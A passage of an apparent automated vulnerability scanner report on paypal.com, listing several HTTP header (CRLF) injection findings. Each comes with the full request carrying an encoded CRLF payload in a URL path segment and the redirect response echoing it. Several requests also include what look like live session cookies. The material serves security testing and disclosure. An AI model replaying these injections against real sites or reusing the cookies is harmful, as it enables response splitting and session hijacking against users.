Cookie: Apache=10.190.9.182.1313112145907951; cwrClyrK4LoCV1fydGbAxiNL6iG=1TXdfYncNPc3OcD3Vsp-sRufuL3kUsQnhEsK-BH5G3gLLDL8WGcZPKWGrDD6_6l8I1pt6X-fwoKmBt7vIY6NL2TJZdpgPlQVHwZ5pVay3LVd9zvWkFFJoMJWStPARnvQ-YGZxW%7cTVA53jSrvERuvSOA7_C6IChutrh77kYpu3GedjoIiNmPvAnuOJU8fImIicwetHt5acDUK0%7cJlqiLcugqxkWGPBl-i2C6vvtUDhrLAULkRZ2TAS5a_kkPTjurigT_b3zi1uzMvpM59ThLG%7c1313156416; navcmd=_account-authenticate-login; pNTcMTtQfrJuaJiwEnWXQ6yNxfq=rkknIxowhDJJRVrakrbrUE1pUOu7kJzzA_4bPaOG0nlYjAwdoYy4a1hPMYvE-pZNF13eAdV2ig7kqd3_wUXFa_XGTQzQVftIXYb3RRgw3C3jdCTMSMf7vo-vIS7x70bDKinfjBxvk37xjDOQ28D8E7rg7bzc68YfPppB-QGUq02WEOcgmj1yFoamLtz6MEvGXprCv2fN5SwWBRffW3RibIetvQhosY5xsnvdAqmB9yswGpmaqk7c1rZjfAffjbs-UA23j2oRoyGtuXPPWoxcD0SujLxjLbwX225-eJ1NTrH0_X9lNc0T0twK0uTTfE7ieTFk8v8MtoHfMfBgPSUUd1jgyL8FWh2VldtR78-QovPoSs9hxaAc0DID5UxpxDo8eVJ5_I-Jp_YDrmM7UDLG6ESd-FDo9NqFFsZXw6MpH1WD5zO4lM1ZuqzodJAZNekNa3jiz_efcS78DaCNdMFx6kHDkw1KnlfGyUGcFl-sNkRc9Qe9NwJn8hCDP7e; KHcl0EuY7AKSMgfvHl7J5E7hPtK=ST3y3Iw9S565SZinIAGKcJZFrmQ4AAlG4kUTV6c4B_buhBjHckuBGvqZh9nhOaGpKgI7-mRZkucmxeTt; cookie_check=yes; consumer_display=USER_HOMEPAGE%3d0%26USER_TARGETPAGE%3d0%26USER_FILTER_CHOICE%3d0%26BALANCE_MODULE_STATE%3d1%26GIFT_BALANCE_MODULE_STATE%3d1%26LAST_SELECTED_ALIAS_ID%3d0%26SELLING_GROUP%3d1%26PAYMENT_AND_RISK_GROUP%3d1%26SHIPPING_GROUP%3d1; navlns=0.0; help_cookie=

Response

HTTP/1.1 301 Moved Permanently
Date: Fri, 12 Aug 2011 14:41:54 GMT
Server: Apache
Location: https://www.paypalobjects.com/f9ea8
d92e26bb157/js/siteWideSearch.js
Content-Length: 277
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="https://www.paypalobjec
...[SNIP]...

1.26. https://www.paypal.com/WEBSCR-640-20110722-1/js/siteWideSearch.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.paypal.com
Path:	/WEBSCR-640-20110722-1/js/siteWideSearch.js

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload 857ce%0d%0a4334d7aac72 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /WEBSCR-640-20110722-1/857ce%0d%0a4334d7aac72/siteWideSearch.js HTTP/1.1
Accept: application/javascript, */*;q=0.8
Referer: https://www.paypal.com/us/cgi-bin/searchscr?cmd=_sitewide-search
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: www.paypal.com
Connection: Keep-Alive
Cookie: Apache=10.190.9.182.1313112145907951; cwrClyrK4LoCV1fydGbAxiNL6iG=1TXdfYncNPc3OcD3Vsp-sRufuL3kUsQnhEsK-BH5G3gLLDL8WGcZPKWGrDD6_6l8I1pt6X-fwoKmBt7vIY6NL2TJZdpgPlQVHwZ5pVay3LVd9zvWkFFJoMJWStPARnvQ-YGZxW%7cTVA53jSrvERuvSOA7_C6IChutrh77kYpu3GedjoIiNmPvAnuOJU8fImIicwetHt5acDUK0%7cJlqiLcugqxkWGPBl-i2C6vvtUDhrLAULkRZ2TAS5a_kkPTjurigT_b3zi1uzMvpM59ThLG%7c1313156416; navcmd=_account-authenticate-login; pNTcMTtQfrJuaJiwEnWXQ6yNxfq=rkknIxowhDJJRVrakrbrUE1pUOu7kJzzA_4bPaOG0nlYjAwdoYy4a1hPMYvE-pZNF13eAdV2ig7kqd3_wUXFa_XGTQzQVftIXYb3RRgw3C3jdCTMSMf7vo-vIS7x70bDKinfjBxvk37xjDOQ28D8E7rg7bzc68YfPppB-QGUq02WEOcgmj1yFoamLtz6MEvGXprCv2fN5SwWBRffW3RibIetvQhosY5xsnvdAqmB9yswGpmaqk7c1rZjfAffjbs-UA23j2oRoyGtuXPPWoxcD0SujLxjLbwX225-eJ1NTrH0_X9lNc0T0twK0uTTfE7ieTFk8v8MtoHfMfBgPSUUd1jgyL8FWh2VldtR78-QovPoSs9hxaAc0DID5UxpxDo8eVJ5_I-Jp_YDrmM7UDLG6ESd-FDo9NqFFsZXw6MpH1WD5zO4lM1ZuqzodJAZNekNa3jiz_efcS78DaCNdMFx6kHDkw1KnlfGyUGcFl-sNkRc9Qe9NwJn8hCDP7e; KHcl0EuY7AKSMgfvHl7J5E7hPtK=ST3y3Iw9S565SZinIAGKcJZFrmQ4AAlG4kUTV6c4B_buhBjHckuBGvqZh9nhOaGpKgI7-mRZkucmxeTt; cookie_check=yes; consumer_display=USER_HOMEPAGE%3d0%26USER_TARGETPAGE%3d0%26USER_FILTER_CHOICE%3d0%26BALANCE_MODULE_STATE%3d1%26GIFT_BALANCE_MODULE_STATE%3d1%26LAST_SELECTED_ALIAS_ID%3d0%26SELLING_GROUP%3d1%26PAYMENT_AND_RISK_GROUP%3d1%26SHIPPING_GROUP%3d1; navlns=0.0; help_cookie=

Response

HTTP/1.1 301 Moved Permanently
Date: Fri, 12 Aug 2011 14:41:58 GMT
Server: Apache
Location: https://www.paypalobjects.com/WEBSCR-640-20110722-1/857ce
4334d7aac72/siteWideSearch.js
Content-Length: 296
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="https://www.paypalobjec
...[SNIP]...

1.27. https://www.paypal.com/WEBSCR-640-20110722-1/js/site_catalyst/pp_jscode_080706.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.paypal.com
Path:	/WEBSCR-640-20110722-1/js/site_catalyst/pp_jscode_080706.js

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 595e6%0d%0aa91d08b4461 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /595e6%0d%0aa91d08b4461/js/site_catalyst/pp_jscode_080706.js HTTP/1.1
Accept: application/javascript, */*;q=0.8
Referer: https://www.paypal.com/us/cgi-bin/searchscr?cmd=_sitewide-search
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: www.paypal.com
Connection: Keep-Alive
Cookie: Apache=10.190.9.182.1313112145907951; cwrClyrK4LoCV1fydGbAxiNL6iG=1TXdfYncNPc3OcD3Vsp-sRufuL3kUsQnhEsK-BH5G3gLLDL8WGcZPKWGrDD6_6l8I1pt6X-fwoKmBt7vIY6NL2TJZdpgPlQVHwZ5pVay3LVd9zvWkFFJoMJWStPARnvQ-YGZxW%7cTVA53jSrvERuvSOA7_C6IChutrh77kYpu3GedjoIiNmPvAnuOJU8fImIicwetHt5acDUK0%7cJlqiLcugqxkWGPBl-i2C6vvtUDhrLAULkRZ2TAS5a_kkPTjurigT_b3zi1uzMvpM59ThLG%7c1313156416; navcmd=_account-authenticate-login; pNTcMTtQfrJuaJiwEnWXQ6yNxfq=rkknIxowhDJJRVrakrbrUE1pUOu7kJzzA_4bPaOG0nlYjAwdoYy4a1hPMYvE-pZNF13eAdV2ig7kqd3_wUXFa_XGTQzQVftIXYb3RRgw3C3jdCTMSMf7vo-vIS7x70bDKinfjBxvk37xjDOQ28D8E7rg7bzc68YfPppB-QGUq02WEOcgmj1yFoamLtz6MEvGXprCv2fN5SwWBRffW3RibIetvQhosY5xsnvdAqmB9yswGpmaqk7c1rZjfAffjbs-UA23j2oRoyGtuXPPWoxcD0SujLxjLbwX225-eJ1NTrH0_X9lNc0T0twK0uTTfE7ieTFk8v8MtoHfMfBgPSUUd1jgyL8FWh2VldtR78-QovPoSs9hxaAc0DID5UxpxDo8eVJ5_I-Jp_YDrmM7UDLG6ESd-FDo9NqFFsZXw6MpH1WD5zO4lM1ZuqzodJAZNekNa3jiz_efcS78DaCNdMFx6kHDkw1KnlfGyUGcFl-sNkRc9Qe9NwJn8hCDP7e; KHcl0EuY7AKSMgfvHl7J5E7hPtK=ST3y3Iw9S565SZinIAGKcJZFrmQ4AAlG4kUTV6c4B_buhBjHckuBGvqZh9nhOaGpKgI7-mRZkucmxeTt; cookie_check=yes; consumer_display=USER_HOMEPAGE%3d0%26USER_TARGETPAGE%3d0%26USER_FILTER_CHOICE%3d0%26BALANCE_MODULE_STATE%3d1%26GIFT_BALANCE_MODULE_STATE%3d1%26LAST_SELECTED_ALIAS_ID%3d0%26SELLING_GROUP%3d1%26PAYMENT_AND_RISK_GROUP%3d1%26SHIPPING_GROUP%3d1; navlns=0.0; help_cookie=

Response

HTTP/1.1 301 Moved Permanently
Date: Fri, 12 Aug 2011 14:41:55 GMT
Server: Apache
Location: https://www.paypalobjects.com/595e6
a91d08b4461/js/site_catalyst/pp_jscode_080706.js
Content-Length: 293
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="https://www.paypalobjec
...[SNIP]...

1.28. https://www.paypal.com/WEBSCR-640-20110722-1/js/site_catalyst/pp_jscode_080706.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.paypal.com
Path:	/WEBSCR-640-20110722-1/js/site_catalyst/pp_jscode_080706.js

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload 58904%0d%0a193e88ed70a was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /WEBSCR-640-20110722-1/58904%0d%0a193e88ed70a/site_catalyst/pp_jscode_080706.js HTTP/1.1
Accept: application/javascript, */*;q=0.8
Referer: https://www.paypal.com/us/cgi-bin/searchscr?cmd=_sitewide-search
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: www.paypal.com
Connection: Keep-Alive
Cookie: Apache=10.190.9.182.1313112145907951; cwrClyrK4LoCV1fydGbAxiNL6iG=1TXdfYncNPc3OcD3Vsp-sRufuL3kUsQnhEsK-BH5G3gLLDL8WGcZPKWGrDD6_6l8I1pt6X-fwoKmBt7vIY6NL2TJZdpgPlQVHwZ5pVay3LVd9zvWkFFJoMJWStPARnvQ-YGZxW%7cTVA53jSrvERuvSOA7_C6IChutrh77kYpu3GedjoIiNmPvAnuOJU8fImIicwetHt5acDUK0%7cJlqiLcugqxkWGPBl-i2C6vvtUDhrLAULkRZ2TAS5a_kkPTjurigT_b3zi1uzMvpM59ThLG%7c1313156416; navcmd=_account-authenticate-login; pNTcMTtQfrJuaJiwEnWXQ6yNxfq=rkknIxowhDJJRVrakrbrUE1pUOu7kJzzA_4bPaOG0nlYjAwdoYy4a1hPMYvE-pZNF13eAdV2ig7kqd3_wUXFa_XGTQzQVftIXYb3RRgw3C3jdCTMSMf7vo-vIS7x70bDKinfjBxvk37xjDOQ28D8E7rg7bzc68YfPppB-QGUq02WEOcgmj1yFoamLtz6MEvGXprCv2fN5SwWBRffW3RibIetvQhosY5xsnvdAqmB9yswGpmaqk7c1rZjfAffjbs-UA23j2oRoyGtuXPPWoxcD0SujLxjLbwX225-eJ1NTrH0_X9lNc0T0twK0uTTfE7ieTFk8v8MtoHfMfBgPSUUd1jgyL8FWh2VldtR78-QovPoSs9hxaAc0DID5UxpxDo8eVJ5_I-Jp_YDrmM7UDLG6ESd-FDo9NqFFsZXw6MpH1WD5zO4lM1ZuqzodJAZNekNa3jiz_efcS78DaCNdMFx6kHDkw1KnlfGyUGcFl-sNkRc9Qe9NwJn8hCDP7e; KHcl0EuY7AKSMgfvHl7J5E7hPtK=ST3y3Iw9S565SZinIAGKcJZFrmQ4AAlG4kUTV6c4B_buhBjHckuBGvqZh9nhOaGpKgI7-mRZkucmxeTt; cookie_check=yes; consumer_display=USER_HOMEPAGE%3d0%26USER_TARGETPAGE%3d0%26USER_FILTER_CHOICE%3d0%26BALANCE_MODULE_STATE%3d1%26GIFT_BALANCE_MODULE_STATE%3d1%26LAST_SELECTED_ALIAS_ID%3d0%26SELLING_GROUP%3d1%26PAYMENT_AND_RISK_GROUP%3d1%26SHIPPING_GROUP%3d1; navlns=0.0; help_cookie=

Response

HTTP/1.1 301 Moved Permanently
Date: Fri, 12 Aug 2011 14:41:58 GMT
Server: Apache
Location: https://www.paypalobjects.com/WEBSCR-640-20110722-1/58904
193e88ed70a/site_catalyst/pp_jscode_080706.js
Content-Length: 312
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="https://www.paypalobjec
...[SNIP]...

1.29. https://www.paypal.com/WEBSCR-640-20110722-1/js/site_catalyst/pp_jscode_080706.js [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.paypal.com
Path:	/WEBSCR-640-20110722-1/js/site_catalyst/pp_jscode_080706.js

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload a24ac%0d%0a505eeda915a was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /WEBSCR-640-20110722-1/js/a24ac%0d%0a505eeda915a/pp_jscode_080706.js HTTP/1.1
Accept: application/javascript, */*;q=0.8
Referer: https://www.paypal.com/us/cgi-bin/searchscr?cmd=_sitewide-search
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: www.paypal.com
Connection: Keep-Alive
Cookie: Apache=10.190.9.182.1313112145907951; cwrClyrK4LoCV1fydGbAxiNL6iG=1TXdfYncNPc3OcD3Vsp-sRufuL3kUsQnhEsK-BH5G3gLLDL8WGcZPKWGrDD6_6l8I1pt6X-fwoKmBt7vIY6NL2TJZdpgPlQVHwZ5pVay3LVd9zvWkFFJoMJWStPARnvQ-YGZxW%7cTVA53jSrvERuvSOA7_C6IChutrh77kYpu3GedjoIiNmPvAnuOJU8fImIicwetHt5acDUK0%7cJlqiLcugqxkWGPBl-i2C6vvtUDhrLAULkRZ2TAS5a_kkPTjurigT_b3zi1uzMvpM59ThLG%7c1313156416; navcmd=_account-authenticate-login; pNTcMTtQfrJuaJiwEnWXQ6yNxfq=rkknIxowhDJJRVrakrbrUE1pUOu7kJzzA_4bPaOG0nlYjAwdoYy4a1hPMYvE-pZNF13eAdV2ig7kqd3_wUXFa_XGTQzQVftIXYb3RRgw3C3jdCTMSMf7vo-vIS7x70bDKinfjBxvk37xjDOQ28D8E7rg7bzc68YfPppB-QGUq02WEOcgmj1yFoamLtz6MEvGXprCv2fN5SwWBRffW3RibIetvQhosY5xsnvdAqmB9yswGpmaqk7c1rZjfAffjbs-UA23j2oRoyGtuXPPWoxcD0SujLxjLbwX225-eJ1NTrH0_X9lNc0T0twK0uTTfE7ieTFk8v8MtoHfMfBgPSUUd1jgyL8FWh2VldtR78-QovPoSs9hxaAc0DID5UxpxDo8eVJ5_I-Jp_YDrmM7UDLG6ESd-FDo9NqFFsZXw6MpH1WD5zO4lM1ZuqzodJAZNekNa3jiz_efcS78DaCNdMFx6kHDkw1KnlfGyUGcFl-sNkRc9Qe9NwJn8hCDP7e; KHcl0EuY7AKSMgfvHl7J5E7hPtK=ST3y3Iw9S565SZinIAGKcJZFrmQ4AAlG4kUTV6c4B_buhBjHckuBGvqZh9nhOaGpKgI7-mRZkucmxeTt; cookie_check=yes; consumer_display=USER_HOMEPAGE%3d0%26USER_TARGETPAGE%3d0%26USER_FILTER_CHOICE%3d0%26BALANCE_MODULE_STATE%3d1%26GIFT_BALANCE_MODULE_STATE%3d1%26LAST_SELECTED_ALIAS_ID%3d0%26SELLING_GROUP%3d1%26PAYMENT_AND_RISK_GROUP%3d1%26SHIPPING_GROUP%3d1; navlns=0.0; help_cookie=

Response

HTTP/1.1 301 Moved Permanently
Date: Fri, 12 Aug 2011 14:42:04 GMT
Server: Apache
Location: https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/a24ac
505eeda915a/pp_jscode_080706.js
Content-Length: 301
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="https://www.paypalobjec
...[SNIP]...

1.30. https://www.paypal.com/en_US/Marketing/i/header/hdr_cpr_welcome_560x82.gif [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.paypal.com
Path:	/en_US/Marketing/i/header/hdr_cpr_welcome_560x82.gif

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload aa55c%0d%0abddcb339e2b was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /aa55c%0d%0abddcb339e2b/Marketing/i/header/hdr_cpr_welcome_560x82.gif HTTP/1.1
Accept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5
Referer: https://www.paypal.com/
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: www.paypal.com
Connection: Keep-Alive
Cookie: cwrClyrK4LoCV1fydGbAxiNL6iG=jdB7YmFJdBAmYatfkLa_e_MUwkzUwN2becl4foK9XdxpaoFcwr7k4yeggSnz1xXeqJgyxfcJ_32kQjtKNmfr2MNA_gkMTN8BzaKM8GIueGWrF1lCa4GDXCBI3PcLnQ_cbS93f0%7cTVA53jSrvERuvSOA7_C6IChutrh77kYpu3GedjoIiNmPvAnuOJU8fImIicwetHt5acDUK0%7cJlqiLcugqxkWGPBl-i2C6vvtUDhrLAULkRZ2TAS5a_kkPTjurigT_b3zi1uzMvpM59ThLG%7c1313112146; KHcl0EuY7AKSMgfvHl7J5E7hPtK=ST3y3Iw9S565SZinIAGKcJZFrmQ4AAlG4kUTV6c4B_buhBjHckuBGvqZh9nhOaGpKgI7-mRZkucmxeTt; cookie_check=yes; navcmd=_home-general; consumer_display=USER_HOMEPAGE%3d0%26USER_TARGETPAGE%3d0%26USER_FILTER_CHOICE%3d0%26BALANCE_MODULE_STATE%3d1%26GIFT_BALANCE_MODULE_STATE%3d1%26LAST_SELECTED_ALIAS_ID%3d0%26SELLING_GROUP%3d1%26PAYMENT_AND_RISK_GROUP%3d1%26SHIPPING_GROUP%3d1; navlns=0.0; Apache=10.190.9.182.1313112145907951

Response

HTTP/1.1 301 Moved Permanently
Date: Fri, 12 Aug 2011 01:22:42 GMT
Server: Apache
Location: https://www.paypalobjects.com/aa55c
bddcb339e2b/Marketing/i/header/hdr_cpr_welcome_560x82.gif
Content-Length: 302
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="https://www.paypalobjec
...[SNIP]...

1.31. https://www.paypal.com/en_US/Marketing/i/header/hdr_cpr_welcome_560x82.gif [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.paypal.com
Path:	/en_US/Marketing/i/header/hdr_cpr_welcome_560x82.gif

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload 73314%0d%0a82f804dc79f was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /en_US/73314%0d%0a82f804dc79f/i/header/hdr_cpr_welcome_560x82.gif HTTP/1.1
Accept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5
Referer: https://www.paypal.com/
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: www.paypal.com
Connection: Keep-Alive
Cookie: cwrClyrK4LoCV1fydGbAxiNL6iG=jdB7YmFJdBAmYatfkLa_e_MUwkzUwN2becl4foK9XdxpaoFcwr7k4yeggSnz1xXeqJgyxfcJ_32kQjtKNmfr2MNA_gkMTN8BzaKM8GIueGWrF1lCa4GDXCBI3PcLnQ_cbS93f0%7cTVA53jSrvERuvSOA7_C6IChutrh77kYpu3GedjoIiNmPvAnuOJU8fImIicwetHt5acDUK0%7cJlqiLcugqxkWGPBl-i2C6vvtUDhrLAULkRZ2TAS5a_kkPTjurigT_b3zi1uzMvpM59ThLG%7c1313112146; KHcl0EuY7AKSMgfvHl7J5E7hPtK=ST3y3Iw9S565SZinIAGKcJZFrmQ4AAlG4kUTV6c4B_buhBjHckuBGvqZh9nhOaGpKgI7-mRZkucmxeTt; cookie_check=yes; navcmd=_home-general; consumer_display=USER_HOMEPAGE%3d0%26USER_TARGETPAGE%3d0%26USER_FILTER_CHOICE%3d0%26BALANCE_MODULE_STATE%3d1%26GIFT_BALANCE_MODULE_STATE%3d1%26LAST_SELECTED_ALIAS_ID%3d0%26SELLING_GROUP%3d1%26PAYMENT_AND_RISK_GROUP%3d1%26SHIPPING_GROUP%3d1; navlns=0.0; Apache=10.190.9.182.1313112145907951

Response

HTTP/1.1 301 Moved Permanently
Date: Fri, 12 Aug 2011 01:22:46 GMT
Server: Apache
Location: https://www.paypalobjects.com/en_US/73314
82f804dc79f/i/header/hdr_cpr_welcome_560x82.gif
Content-Length: 298
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="https://www.paypalobjec
...[SNIP]...

1.32. https://www.paypal.com/en_US/Marketing/i/header/hdr_cpr_welcome_560x82.gif [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.paypal.com
Path:	/en_US/Marketing/i/header/hdr_cpr_welcome_560x82.gif

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload 38f8e%0d%0a0d445ebd2cd was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /en_US/Marketing/38f8e%0d%0a0d445ebd2cd/header/hdr_cpr_welcome_560x82.gif HTTP/1.1
Accept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5
Referer: https://www.paypal.com/
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: www.paypal.com
Connection: Keep-Alive
Cookie: cwrClyrK4LoCV1fydGbAxiNL6iG=jdB7YmFJdBAmYatfkLa_e_MUwkzUwN2becl4foK9XdxpaoFcwr7k4yeggSnz1xXeqJgyxfcJ_32kQjtKNmfr2MNA_gkMTN8BzaKM8GIueGWrF1lCa4GDXCBI3PcLnQ_cbS93f0%7cTVA53jSrvERuvSOA7_C6IChutrh77kYpu3GedjoIiNmPvAnuOJU8fImIicwetHt5acDUK0%7cJlqiLcugqxkWGPBl-i2C6vvtUDhrLAULkRZ2TAS5a_kkPTjurigT_b3zi1uzMvpM59ThLG%7c1313112146; KHcl0EuY7AKSMgfvHl7J5E7hPtK=ST3y3Iw9S565SZinIAGKcJZFrmQ4AAlG4kUTV6c4B_buhBjHckuBGvqZh9nhOaGpKgI7-mRZkucmxeTt; cookie_check=yes; navcmd=_home-general; consumer_display=USER_HOMEPAGE%3d0%26USER_TARGETPAGE%3d0%26USER_FILTER_CHOICE%3d0%26BALANCE_MODULE_STATE%3d1%26GIFT_BALANCE_MODULE_STATE%3d1%26LAST_SELECTED_ALIAS_ID%3d0%26SELLING_GROUP%3d1%26PAYMENT_AND_RISK_GROUP%3d1%26SHIPPING_GROUP%3d1; navlns=0.0; Apache=10.190.9.182.1313112145907951

Response

HTTP/1.1 301 Moved Permanently
Date: Fri, 12 Aug 2011 01:22:51 GMT
Server: Apache
Location: https://www.paypalobjects.com/en_US/Marketing/38f8e
0d445ebd2cd/header/hdr_cpr_welcome_560x82.gif
Content-Length: 306
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="https://www.paypalobjec
...[SNIP]...

1.33. https://www.paypal.com/en_US/Marketing/i/header/hdr_cpr_welcome_560x82.gif [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.paypal.com
Path:	/en_US/Marketing/i/header/hdr_cpr_welcome_560x82.gif

Issue detail

The value of REST URL parameter 4 is copied into the Location response header. The payload ddd01%0d%0af72c8a932ab was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.

Request

GET /en_US/Marketing/i/ddd01%0d%0af72c8a932ab/hdr_cpr_welcome_560x82.gif HTTP/1.1
Accept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5
Referer: https://www.paypal.com/
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: www.paypal.com
Connection: Keep-Alive
Cookie: cwrClyrK4LoCV1fydGbAxiNL6iG=jdB7YmFJdBAmYatfkLa_e_MUwkzUwN2becl4foK9XdxpaoFcwr7k4yeggSnz1xXeqJgyxfcJ_32kQjtKNmfr2MNA_gkMTN8BzaKM8GIueGWrF1lCa4GDXCBI3PcLnQ_cbS93f0%7cTVA53jSrvERuvSOA7_C6IChutrh77kYpu3GedjoIiNmPvAnuOJU8fImIicwetHt5acDUK0%7cJlqiLcugqxkWGPBl-i2C6vvtUDhrLAULkRZ2TAS5a_kkPTjurigT_b3zi1uzMvpM59ThLG%7c1313112146; KHcl0EuY7AKSMgfvHl7J5E7hPtK=ST3y3Iw9S565SZinIAGKcJZFrmQ4AAlG4kUTV6c4B_buhBjHckuBGvqZh9nhOaGpKgI7-mRZkucmxeTt; cookie_check=yes; navcmd=_home-general; consumer_display=USER_HOMEPAGE%3d0%26USER_TARGETPAGE%3d0%26USER_FILTER_CHOICE%3d0%26BALANCE_MODULE_STATE%3d1%26GIFT_BALANCE_MODULE_STATE%3d1%26LAST_SELECTED_ALIAS_ID%3d0%26SELLING_GROUP%3d1%26PAYMENT_AND_RISK_GROUP%3d1%26SHIPPING_GROUP%3d1; navlns=0.0; Apache=10.190.9.182.1313112145907951

Response

HTTP/1.1 301 Moved Permanently
Date: Fri, 12 Aug 2011 01:22:55 GMT
Server: Apache
Location: https://www.paypalobjects.com/en_US/Marketing/i/ddd01
f72c8a932ab/hdr_cpr_welcome_560x82.gif
Content-Length: 301
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="https://www.paypalobjec
...[SNIP]...

1.34. https://www.paypal.com/en_US/i/header/header_bg.gif [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.paypal.com
Path:	/en_US/i/header/header_bg.gif

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 9f592%0d%0a5da3fba8eab was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /9f592%0d%0a5da3fba8eab/i/header/header_bg.gif HTTP/1.1
Accept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5
Referer: https://www.paypal.com/cgi-bin/webscr?cmd=_flow&SESSION=M5rZd4ZZP2gDMdA2Lu9sOXevrynrQioy9AyKX2bWrhn8uW2M5rNBXVN3X5S&dispatch=5885d80a13c0db1f8e263663d3faee8d1e83f46a36995b3856cef1e18897ad75
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: www.paypal.com
Connection: Keep-Alive
